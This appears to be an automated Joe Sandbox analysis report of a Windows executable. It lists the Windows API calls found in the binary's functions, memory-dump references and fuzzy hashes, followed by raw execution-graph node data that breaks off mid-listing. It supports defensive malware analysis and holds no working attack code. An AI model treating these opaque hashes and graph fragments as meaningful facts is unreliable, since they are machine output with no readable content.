• Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
• Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
APIs
• GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
• lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
Similarity
• API ID: PrivateProfileStringlstrcmp
• String ID: !N~
• API String ID: 623250636-529124213
• Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
• Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
• Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
• Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
• CloseHandle.KERNEL32(?), ref: 00405C71
Strings
• Error launching installer, xrefs: 00405C48
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
• Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
• Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
• Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
APIs
• lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
• wvsprintfW.USER32(00000000,?,?), ref: 004062C7
  • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
Similarity
• API ID: CloseHandlelstrlenwvsprintf
• String ID: RMDir: RemoveDirectory invalid input("")
• API String ID: 3509786178-2769509956
• Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
• Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
• Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
• Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
APIs
• lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
• lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
• CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
• lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
• Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
• Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
• Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Execution Graph

Execution Coverage: 4.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.5%
Total number of Nodes: 2000
Total number of Limit Nodes: 81
execution_graph: node and edge listing of the rendered call graph (raw graph data, not reproduced as text)
98617->99182 99290 eaf87d 98620->99290 98622 eae4b0 98622->98432 98624 e44d37 84 API calls 98623->98624 98625 eac286 98624->98625 99426 ea4005 98625->99426 98627 eac28e 98628 eac2a7 98627->98628 98629 eac292 GetLastError 98627->98629 98628->98432 98629->98628 98630->98432 98632 e51a45 __NMSG_WRITE _memmove 98631->98632 98633 e60fe6 Mailbox 59 API calls 98632->98633 98634 e51a83 98633->98634 98634->98417 98635->98362 98636->98368 98637->98432 98638->98369 98639->98369 98640->98369 98642 e51ca7 98641->98642 98643 e51caf 98641->98643 99450 e51bcc 59 API calls 2 library calls 98642->99450 98643->98432 98645->98432 98646->98432 98647->98432 98649 e44d51 98648->98649 98661 e44d4b 98648->98661 98650 e7db28 __i64tow 98649->98650 98651 e44d99 98649->98651 98653 e44d57 __itow 98649->98653 98656 e7da2f 98649->98656 99451 e638c8 83 API calls 3 library calls 98651->99451 98655 e60fe6 Mailbox 59 API calls 98653->98655 98658 e44d71 98655->98658 98657 e7daa7 Mailbox _wcscpy 98656->98657 98659 e60fe6 Mailbox 59 API calls 98656->98659 99452 e638c8 83 API calls 3 library calls 98657->99452 98660 e51a36 59 API calls 98658->98660 98658->98661 98662 e7da74 98659->98662 98660->98661 98661->98432 98663 e60fe6 Mailbox 59 API calls 98662->98663 98664 e7da9a 98663->98664 98664->98657 98665 e51a36 59 API calls 98664->98665 98665->98657 98666->98432 98667->98432 98669 e60fe6 Mailbox 59 API calls 98668->98669 98670 e51228 98669->98670 98671 e60fe6 Mailbox 59 API calls 98670->98671 98672 e51236 98671->98672 98672->98412 98673->98412 98674->98412 98675->98412 98676->98412 98678 ebc39a 98677->98678 98679 ebc380 98677->98679 99453 eba8fd 98678->99453 99480 eaa48d 89 API calls 4 library calls 98679->99480 98683 e453b0 429 API calls 98684 ebc406 98683->98684 98685 ebc498 98684->98685 98688 ebc447 98684->98688 98710 ebc392 Mailbox 98684->98710 98686 ebc4ee 98685->98686 98687 ebc49e 98685->98687 98689 e44d37 84 API calls 98686->98689 98686->98710 99481 ea7ed5 59 API calls 98687->99481 98692 ea789a 59 
API calls 98688->98692 98690 ebc500 98689->98690 98693 e51aa4 59 API calls 98690->98693 98695 ebc477 98692->98695 98696 ebc524 CharUpperBuffW 98693->98696 98694 ebc4c1 99482 e535b9 59 API calls Mailbox 98694->99482 98699 e96ebc 429 API calls 98695->98699 98700 ebc53e 98696->98700 98698 ebc4c9 Mailbox 98703 e4b020 429 API calls 98698->98703 98699->98710 98701 ebc591 98700->98701 98702 ebc545 98700->98702 98704 e44d37 84 API calls 98701->98704 99460 ea789a 98702->99460 98703->98710 98705 ebc599 98704->98705 99483 e45376 60 API calls 98705->99483 98710->98432 98711 ebc5a3 98711->98710 98712 e44d37 84 API calls 98711->98712 98713 ebc5be 98712->98713 99484 e535b9 59 API calls Mailbox 98713->99484 98715 ebc5ce 98716 e4b020 429 API calls 98715->98716 98716->98710 98717->98412 98718->98412 98719->98412 99607 ea4ce2 98720->99607 98722 ea4244 CloseHandle 98722->98412 98723 ea4195 Process32NextW 98723->98722 98727 ea418e Mailbox 98723->98727 98724 e51207 59 API calls 98724->98727 98725 e51a36 59 API calls 98725->98727 98726 e60119 59 API calls 98726->98727 98727->98722 98727->98723 98727->98724 98727->98725 98727->98726 98728 e517e0 59 API calls 98727->98728 98729 e5151f 61 API calls 98727->98729 98728->98727 98729->98727 98731 e435e2 98730->98731 98734 e435b0 98730->98734 98731->98507 98732 e435d5 IsDialogMessageW 98732->98731 98732->98734 98733 e7d273 GetClassLongW 98733->98732 98733->98734 98734->98731 98734->98732 98734->98733 98736 e453b0 430 API calls 98735->98736 98737 e4951f 98736->98737 98738 e82001 98737->98738 98752 e49527 _memmove 98737->98752 98771 e45190 59 API calls Mailbox 98738->98771 98740 e822c0 98777 eaa48d 89 API calls 4 library calls 98740->98777 98742 e822de 98742->98742 98743 e49583 98743->98517 98744 e49944 98747 e60fe6 Mailbox 59 API calls 98744->98747 98745 e4986a 98748 e822b1 98745->98748 98749 e4987f 98745->98749 98746 e60fe6 59 API calls Mailbox 98746->98752 98759 e496e3 _memmove 98747->98759 98776 eba983 59 API calls 98748->98776 98751 e60fe6 
Mailbox 59 API calls 98749->98751 98762 e4977d 98751->98762 98752->98740 98752->98743 98752->98744 98752->98746 98753 e496cf 98752->98753 98766 e49741 98752->98766 98753->98744 98755 e496dc 98753->98755 98754 e60fe6 Mailbox 59 API calls 98757 e4970e 98754->98757 98756 e60fe6 Mailbox 59 API calls 98755->98756 98756->98759 98757->98766 98770 e4cca0 430 API calls 98757->98770 98758 e822a0 98775 eaa48d 89 API calls 4 library calls 98758->98775 98759->98754 98759->98757 98759->98766 98762->98517 98764 e82278 98774 eaa48d 89 API calls 4 library calls 98764->98774 98766->98745 98766->98758 98766->98762 98766->98764 98767 e82253 98766->98767 98772 e48180 430 API calls 98766->98772 98773 eaa48d 89 API calls 4 library calls 98767->98773 98769->98519 98770->98766 98771->98744 98772->98766 98773->98762 98774->98762 98775->98762 98776->98740 98777->98742 98778->98548 98779->98548 98780->98548 98781->98548 98782->98548 98783->98548 98784->98543 98785->98548 98786->98548 98787->98565 98788->98554 98789->98565 98790->98564 98791->98565 98793 ea4131 98792->98793 98794 ea4965 FindFirstFileW 98792->98794 98793->98432 98794->98793 98795 ea497a FindClose 98794->98795 98795->98793 98797 e45041 98796->98797 98798 e4503c 98796->98798 98797->98579 98798->98797 98918 e637ba 59 API calls 98798->98918 98801 e51207 59 API calls 98800->98801 98802 e6012f 98801->98802 98803 e51207 59 API calls 98802->98803 98804 e60137 98803->98804 98805 e51207 59 API calls 98804->98805 98806 e6013f 98805->98806 98807 e51207 59 API calls 98806->98807 98808 e60147 98807->98808 98809 e9627d 98808->98809 98810 e6017b 98808->98810 98811 e51c9c 59 API calls 98809->98811 98812 e51462 59 API calls 98810->98812 98813 e96286 98811->98813 98814 e60189 98812->98814 98939 e519e1 98813->98939 98932 e51981 98814->98932 98817 e60193 98818 e601be 98817->98818 98819 e51462 59 API calls 98817->98819 98820 e601fe 98818->98820 98822 e601dd 98818->98822 98833 e962a6 98818->98833 98823 e601b4 98819->98823 98919 e51462 98820->98919 
98936 e51609 98822->98936 98826 e51981 59 API calls 98823->98826 98824 e6020f 98828 e60221 98824->98828 98831 e51c9c 59 API calls 98824->98831 98825 e96376 98829 e51821 59 API calls 98825->98829 98826->98818 98832 e60231 98828->98832 98835 e51c9c 59 API calls 98828->98835 98846 e96333 98829->98846 98831->98828 98837 e60238 98832->98837 98838 e51c9c 59 API calls 98832->98838 98833->98825 98836 e9635f 98833->98836 98845 e962dd 98833->98845 98834 e51462 59 API calls 98834->98820 98835->98832 98836->98825 98841 e9634a 98836->98841 98839 e51c9c 59 API calls 98837->98839 98848 e6023f Mailbox 98837->98848 98838->98837 98839->98848 98840 e51609 59 API calls 98840->98846 98843 e51821 59 API calls 98841->98843 98842 e9633b 98844 e51821 59 API calls 98842->98844 98843->98846 98844->98846 98845->98842 98849 e96326 98845->98849 98846->98820 98846->98840 98952 e5153b 59 API calls 2 library calls 98846->98952 98848->98593 98943 e51821 98849->98943 98852 e517f2 98851->98852 98853 e8f401 98851->98853 98958 e51680 98852->98958 98964 e987f9 59 API calls _memmove 98853->98964 98856 e517fe 98856->98596 98856->98604 98857 e8f40b 98858 e51c9c 59 API calls 98857->98858 98859 e8f413 Mailbox 98858->98859 98965 e5133d 98860->98965 98863 ea3f66 GetLastError 98864 ea3f73 CreateDirectoryW 98863->98864 98865 ea3f81 98863->98865 98864->98865 98866 ea3f7f Mailbox 98864->98866 98865->98866 98867 e51981 59 API calls 98865->98867 98866->98604 98868 ea3fc3 98867->98868 98869 ea3f1d 59 API calls 98868->98869 98870 ea3fcc 98869->98870 98870->98866 98871 ea3fd0 CreateDirectoryW 98870->98871 98871->98866 98873 e51207 59 API calls 98872->98873 98874 ea3cff 98873->98874 98875 e51207 59 API calls 98874->98875 98876 ea3d07 98875->98876 98877 e51207 59 API calls 98876->98877 98878 ea3d0f 98877->98878 98879 e51207 59 API calls 98878->98879 98880 ea3d17 98879->98880 98969 e60284 98880->98969 98883 e60284 60 API calls 98884 ea3d2b 98883->98884 98979 ea4f82 98884->98979 98886 ea3d36 98990 ea4fec GetFileAttributesW 
98886->98990 98889 ea3d53 98891 ea4fec GetFileAttributesW 98889->98891 98890 e51900 59 API calls 98890->98889 98892 ea3d5b 98891->98892 98893 ea3d68 98892->98893 98894 e51900 59 API calls 98892->98894 98895 e51207 59 API calls 98893->98895 98894->98893 98896 ea3d70 98895->98896 98897 e51207 59 API calls 98896->98897 98898 ea3d78 98897->98898 98899 e60119 59 API calls 98898->98899 98900 ea3d89 FindFirstFileW 98899->98900 98901 ea3eb4 FindClose 98900->98901 98915 ea3dac Mailbox 98900->98915 98907 ea3ebe Mailbox 98901->98907 98902 ea3e88 FindNextFileW 98902->98915 98903 e51a36 59 API calls 98903->98915 98905 e51c9c 59 API calls 98905->98915 98906 e517e0 59 API calls 98906->98915 98907->98603 98909 ea412a 3 API calls 98909->98915 98910 ea3e2a 98914 ea3e4e MoveFileW 98910->98914 98916 ea3e3e DeleteFileW 98910->98916 99053 e5151f 98910->99053 98911 ea3eab FindClose 98911->98907 98912 ea3ef7 CopyFileExW 98912->98915 98914->98915 98915->98901 98915->98902 98915->98903 98915->98905 98915->98906 98915->98909 98915->98910 98915->98911 98915->98912 98917 ea3e6b DeleteFileW 98915->98917 98992 ea4561 98915->98992 99046 e51900 98915->99046 98916->98915 98917->98915 98918->98797 98920 e51471 98919->98920 98921 e514ce 98919->98921 98920->98921 98923 e5147c 98920->98923 98922 e51981 59 API calls 98921->98922 98929 e5149f _memmove 98922->98929 98924 e51497 98923->98924 98925 e8f1de 98923->98925 98953 e51b7c 59 API calls Mailbox 98924->98953 98954 e51c7e 98925->98954 98928 e8f1e8 98930 e60fe6 Mailbox 59 API calls 98928->98930 98929->98824 98931 e8f208 98930->98931 98933 e51998 _memmove 98932->98933 98934 e5198f 98932->98934 98933->98817 98934->98933 98935 e51aa4 59 API calls 98934->98935 98935->98933 98937 e51aa4 59 API calls 98936->98937 98938 e51614 98937->98938 98938->98820 98938->98834 98940 e519ee 98939->98940 98941 e519fb 98939->98941 98940->98818 98942 e60fe6 Mailbox 59 API calls 98941->98942 98942->98940 98944 e5182d __NMSG_WRITE 98943->98944 98945 e5189a 98943->98945 98947 
e51843 98944->98947 98948 e51868 98944->98948 98946 e51981 59 API calls 98945->98946 98951 e5184b _memmove 98946->98951 98957 e51b7c 59 API calls Mailbox 98947->98957 98950 e51c7e 59 API calls 98948->98950 98950->98951 98951->98846 98952->98846 98953->98929 98955 e60fe6 Mailbox 59 API calls 98954->98955 98956 e51c88 98955->98956 98956->98928 98957->98951 98959 e51692 98958->98959 98962 e516ba _memmove 98958->98962 98960 e60fe6 Mailbox 59 API calls 98959->98960 98959->98962 98961 e5176f _memmove 98960->98961 98963 e60fe6 Mailbox 59 API calls 98961->98963 98962->98856 98963->98961 98964->98857 98966 e5134b 98965->98966 98967 e51981 59 API calls 98966->98967 98968 e5135b GetFileAttributesW 98967->98968 98968->98863 98968->98866 99056 e71b70 98969->99056 98972 e602b0 98974 e51821 59 API calls 98972->98974 98973 e602cd 98975 e519e1 59 API calls 98973->98975 98976 e602bc 98974->98976 98975->98976 98977 e5133d 59 API calls 98976->98977 98978 e602c8 98977->98978 98978->98883 98980 e51207 59 API calls 98979->98980 98981 ea4f97 98980->98981 98982 e51207 59 API calls 98981->98982 98983 ea4f9f 98982->98983 98984 e60119 59 API calls 98983->98984 98985 ea4fae 98984->98985 98986 e60119 59 API calls 98985->98986 98987 ea4fbe 98986->98987 98988 e5151f 61 API calls 98987->98988 98989 ea4fce Mailbox 98988->98989 98989->98886 98991 ea3d41 98990->98991 98991->98889 98991->98890 98993 ea457d 98992->98993 98994 ea4582 98993->98994 98995 ea4590 98993->98995 98996 e51c9c 59 API calls 98994->98996 98997 e51207 59 API calls 98995->98997 98998 ea458b Mailbox 98996->98998 98999 ea4598 98997->98999 98998->98915 99000 e51207 59 API calls 98999->99000 99001 ea45a0 99000->99001 99002 e51207 59 API calls 99001->99002 99003 ea45ab 99002->99003 99004 e51207 59 API calls 99003->99004 99005 ea45b3 99004->99005 99006 e51207 59 API calls 99005->99006 99007 ea45bb 99006->99007 99008 e51207 59 API calls 99007->99008 99009 ea45c3 99008->99009 99010 e51207 59 API calls 99009->99010 99011 ea45cb 99010->99011 
99012 e51207 59 API calls 99011->99012 99013 ea45d3 99012->99013 99014 e60119 59 API calls 99013->99014 99015 ea45ea 99014->99015 99016 e60119 59 API calls 99015->99016 99017 ea4603 99016->99017 99018 e51609 59 API calls 99017->99018 99019 ea460f 99018->99019 99020 ea4622 99019->99020 99021 e51981 59 API calls 99019->99021 99022 e51609 59 API calls 99020->99022 99021->99020 99023 ea462b 99022->99023 99024 ea463b 99023->99024 99025 e51981 59 API calls 99023->99025 99026 e51c9c 59 API calls 99024->99026 99025->99024 99027 ea4647 99026->99027 99028 e517e0 59 API calls 99027->99028 99029 ea4653 99028->99029 99058 ea4713 59 API calls 99029->99058 99031 ea4662 99059 ea4713 59 API calls 99031->99059 99033 ea4675 99034 e51609 59 API calls 99033->99034 99035 ea467f 99034->99035 99036 ea4696 99035->99036 99037 ea4684 99035->99037 99038 e51609 59 API calls 99036->99038 99039 e51900 59 API calls 99037->99039 99040 ea469f 99038->99040 99041 ea4691 99039->99041 99042 ea46bd 99040->99042 99043 e51900 59 API calls 99040->99043 99044 e517e0 59 API calls 99041->99044 99045 e517e0 59 API calls 99042->99045 99043->99041 99044->99042 99045->98998 99047 e51914 99046->99047 99048 e8f534 99046->99048 99060 e518a5 99047->99060 99050 e51c7e 59 API calls 99048->99050 99052 e8f53f __NMSG_WRITE _memmove 99050->99052 99051 e5191f 99051->98915 99065 e514db 99053->99065 99057 e60291 GetFullPathNameW 99056->99057 99057->98972 99057->98973 99058->99031 99059->99033 99061 e518b4 __NMSG_WRITE 99060->99061 99062 e518c5 _memmove 99061->99062 99063 e51c7e 59 API calls 99061->99063 99062->99051 99064 e8f4f1 _memmove 99063->99064 99066 e514e9 CompareStringW 99065->99066 99071 e8f210 99065->99071 99068 e5150c 99066->99068 99068->98910 99069 e64eb8 60 API calls 99069->99071 99070 e8f25f 99071->99069 99071->99070 99073 e44d37 84 API calls 99072->99073 99074 ebd203 99073->99074 99097 ebd24a Mailbox 99074->99097 99110 ebde8e 99074->99110 99076 ebd4a2 99077 ebd617 99076->99077 99081 ebd4b0 99076->99081 99161 
ebdfb1 92 API calls Mailbox 99077->99161 99080 ebd626 99080->99081 99083 ebd632 99080->99083 99123 ebd057 99081->99123 99082 e44d37 84 API calls 99098 ebd29b Mailbox 99082->99098 99083->99097 99088 ebd4e9 99138 e60e38 99088->99138 99091 ebd51c 99146 e447be 99091->99146 99092 ebd503 99145 eaa48d 89 API calls 4 library calls 99092->99145 99095 ebd50e GetCurrentProcess TerminateProcess 99095->99091 99097->98607 99098->99076 99098->99082 99098->99097 99143 eafc0d 59 API calls 2 library calls 99098->99143 99144 ebd6c8 61 API calls 2 library calls 99098->99144 99102 ebd554 99158 ebdd32 107 API calls _free 99102->99158 99103 ebd68d 99103->99097 99106 ebd6a1 FreeLibrary 99103->99106 99106->99097 99109 ebd565 99109->99103 99159 e44230 59 API calls Mailbox 99109->99159 99160 e4523c 59 API calls 99109->99160 99162 ebdd32 107 API calls _free 99109->99162 99111 e51aa4 59 API calls 99110->99111 99112 ebdea9 CharLowerBuffW 99111->99112 99163 e9f903 99112->99163 99116 e51207 59 API calls 99117 ebdee2 99116->99117 99118 e51462 59 API calls 99117->99118 99119 ebdef9 99118->99119 99120 e51981 59 API calls 99119->99120 99121 ebdf05 Mailbox 99120->99121 99122 ebdf41 Mailbox 99121->99122 99170 ebd6c8 61 API calls 2 library calls 99121->99170 99122->99098 99124 ebd072 99123->99124 99128 ebd0c7 99123->99128 99125 e60fe6 Mailbox 59 API calls 99124->99125 99126 ebd094 99125->99126 99127 e60fe6 Mailbox 59 API calls 99126->99127 99126->99128 99127->99126 99129 ebe139 99128->99129 99130 ebe362 Mailbox 99129->99130 99137 ebe15c _strcat _wcscpy __NMSG_WRITE 99129->99137 99130->99088 99131 e450d5 59 API calls 99131->99137 99132 e4502b 59 API calls 99132->99137 99133 e45087 59 API calls 99133->99137 99134 e44d37 84 API calls 99134->99137 99135 e6593c 58 API calls __crtCompareStringA_stat 99135->99137 99137->99130 99137->99131 99137->99132 99137->99133 99137->99134 99137->99135 99171 ea5e42 61 API calls 2 library calls 99137->99171 99140 e60e4d 99138->99140 99139 e60ee5 NtResumeThread 99142 e60eb3 
99139->99142 99140->99139 99141 e60ed3 CloseHandle 99140->99141 99140->99142 99141->99142 99142->99091 99142->99092 99143->99098 99144->99098 99145->99095 99147 e447c6 99146->99147 99148 e60fe6 Mailbox 59 API calls 99147->99148 99149 e447d4 99148->99149 99150 e447e0 99149->99150 99172 e446ec 59 API calls Mailbox 99149->99172 99152 e44540 99150->99152 99173 e44650 99152->99173 99154 e60fe6 Mailbox 59 API calls 99155 e445eb 99154->99155 99155->99109 99157 e44230 59 API calls Mailbox 99155->99157 99156 e4454f 99156->99154 99156->99155 99157->99102 99158->99109 99159->99109 99160->99109 99161->99080 99162->99109 99164 e9f92e __NMSG_WRITE 99163->99164 99165 e9f96d 99164->99165 99168 e9f963 99164->99168 99169 e9fa14 99164->99169 99165->99116 99165->99121 99166 e514db 61 API calls 99166->99168 99167 e514db 61 API calls 99167->99169 99168->99165 99168->99166 99169->99165 99169->99167 99170->99122 99171->99137 99172->99150 99174 e44659 Mailbox 99173->99174 99175 e7d6ec 99174->99175 99180 e44663 99174->99180 99176 e60fe6 Mailbox 59 API calls 99175->99176 99178 e7d6f8 99176->99178 99177 e4466a 99177->99156 99180->99177 99181 e45190 59 API calls Mailbox 99180->99181 99181->99180 99183 ebfda3 _memset 99182->99183 99184 ebfe0a 99183->99184 99185 ebfde0 99183->99185 99189 e4502b 59 API calls 99184->99189 99190 ebfe2e 99184->99190 99186 e4502b 59 API calls 99185->99186 99187 ebfdeb 99186->99187 99187->99190 99193 e4502b 59 API calls 99187->99193 99188 ebfe68 99192 e44d37 84 API calls 99188->99192 99191 ebfe00 99189->99191 99190->99188 99194 e4502b 59 API calls 99190->99194 99196 e4502b 59 API calls 99191->99196 99195 ebfe8c 99192->99195 99193->99191 99194->99188 99265 e5436a 99195->99265 99196->99190 99198 ebfe96 99199 ebff59 99198->99199 99200 ebfea0 99198->99200 99202 ebff8b GetCurrentDirectoryW 99199->99202 99205 e44d37 84 API calls 99199->99205 99201 e44d37 84 API calls 99200->99201 99203 ebfeb1 99201->99203 99204 e60fe6 Mailbox 59 API calls 99202->99204 99206 e5436a 59 API 
calls 99203->99206 99207 ebffb0 GetCurrentDirectoryW 99204->99207 99208 ebff70 99205->99208 99210 ebfebb 99206->99210 99211 ebffbd 99207->99211 99209 e5436a 59 API calls 99208->99209 99212 ebff7a __NMSG_WRITE 99209->99212 99213 e44d37 84 API calls 99210->99213 99219 ebfff6 99211->99219 99269 e44f98 99211->99269 99212->99202 99212->99219 99214 ebfecc 99213->99214 99215 e5436a 59 API calls 99214->99215 99217 ebfed6 99215->99217 99221 e44d37 84 API calls 99217->99221 99220 ec0042 99219->99220 99282 ea7652 8 API calls 99219->99282 99227 ec006e 99220->99227 99228 ec0114 CreateProcessW 99220->99228 99224 ebfee7 99221->99224 99222 e44f98 59 API calls 99225 ebffe6 99222->99225 99229 e5436a 59 API calls 99224->99229 99230 e44f98 59 API calls 99225->99230 99226 ec000d 99283 ea7561 8 API calls 99226->99283 99285 e98ef3 76 API calls 99227->99285 99264 ec00a7 __NMSG_WRITE 99228->99264 99231 ebfef1 99229->99231 99230->99219 99234 ebff27 GetSystemDirectoryW 99231->99234 99239 e44d37 84 API calls 99231->99239 99241 e60fe6 Mailbox 59 API calls 99234->99241 99235 ec0028 99284 ea75da 8 API calls 99235->99284 99236 ec0073 99237 ec009b 99236->99237 99238 ec00a2 99236->99238 99286 e98f2e 149 API calls 4 library calls 99237->99286 99287 e991cf 6 API calls 99238->99287 99243 ebff08 99239->99243 99245 ebff4c GetSystemDirectoryW 99241->99245 99247 e5436a 59 API calls 99243->99247 99245->99211 99246 ec00a0 99246->99264 99248 ebff12 __NMSG_WRITE 99247->99248 99248->99211 99248->99234 99249 ec0190 CloseHandle 99251 ec019e 99249->99251 99257 ec01c8 99249->99257 99250 ec0153 99252 ec0164 GetLastError 99250->99252 99288 ea7205 CloseHandle Mailbox 99251->99288 99256 ec0178 99252->99256 99254 ec01ce 99254->99256 99289 ea702f CloseHandle Mailbox 99256->99289 99257->99254 99260 ec01fa CloseHandle 99257->99260 99260->99256 99261 ebf94e 99261->98432 99264->99249 99264->99250 99266 e54374 __NMSG_WRITE 99265->99266 99267 e60fe6 Mailbox 59 API calls 99266->99267 99268 e54389 _wcscpy 99267->99268 
99268->99198 99270 e7dd2b 99269->99270 99271 e44fa8 99269->99271 99272 e7dd3c 99270->99272 99273 e51821 59 API calls 99270->99273 99276 e60fe6 Mailbox 59 API calls 99271->99276 99274 e519e1 59 API calls 99272->99274 99273->99272 99275 e7dd46 99274->99275 99278 e44fd4 99275->99278 99280 e51207 59 API calls 99275->99280 99277 e44fbb 99276->99277 99277->99275 99279 e44fc6 99277->99279 99278->99222 99279->99278 99281 e51a36 59 API calls 99279->99281 99280->99278 99281->99278 99282->99226 99283->99235 99284->99220 99285->99236 99286->99246 99287->99264 99289->99261 99291 eaf898 99290->99291 99292 eaf8f2 99290->99292 99293 e60fe6 Mailbox 59 API calls 99291->99293 99366 eafbb7 59 API calls 99292->99366 99295 eaf89f 99293->99295 99296 eaf8ab 99295->99296 99353 e53df7 60 API calls Mailbox 99295->99353 99298 e44d37 84 API calls 99296->99298 99302 eaf8bd 99298->99302 99299 eaf9cb 99346 ea8cd0 99299->99346 99300 eaf8ff 99300->99299 99303 eaf8d9 99300->99303 99307 eaf93f 99300->99307 99354 e53e47 99302->99354 99303->98622 99304 eaf9d2 99350 ea394d 99304->99350 99309 e44d37 84 API calls 99307->99309 99308 eaf8cd 99308->99303 99365 e53f0b CloseHandle 99308->99365 99316 eaf946 99309->99316 99312 eaf9c1 99327 ea399c 99312->99327 99313 eaf97a 99367 e5162d 99313->99367 99316->99312 99316->99313 99318 e542cf CloseHandle 99319 eafa20 99318->99319 99319->99303 99372 e53f0b CloseHandle 99319->99372 99320 e51c9c 59 API calls 99321 eaf994 99320->99321 99323 e51900 59 API calls 99321->99323 99324 eaf9a2 99323->99324 99325 ea399c 66 API calls 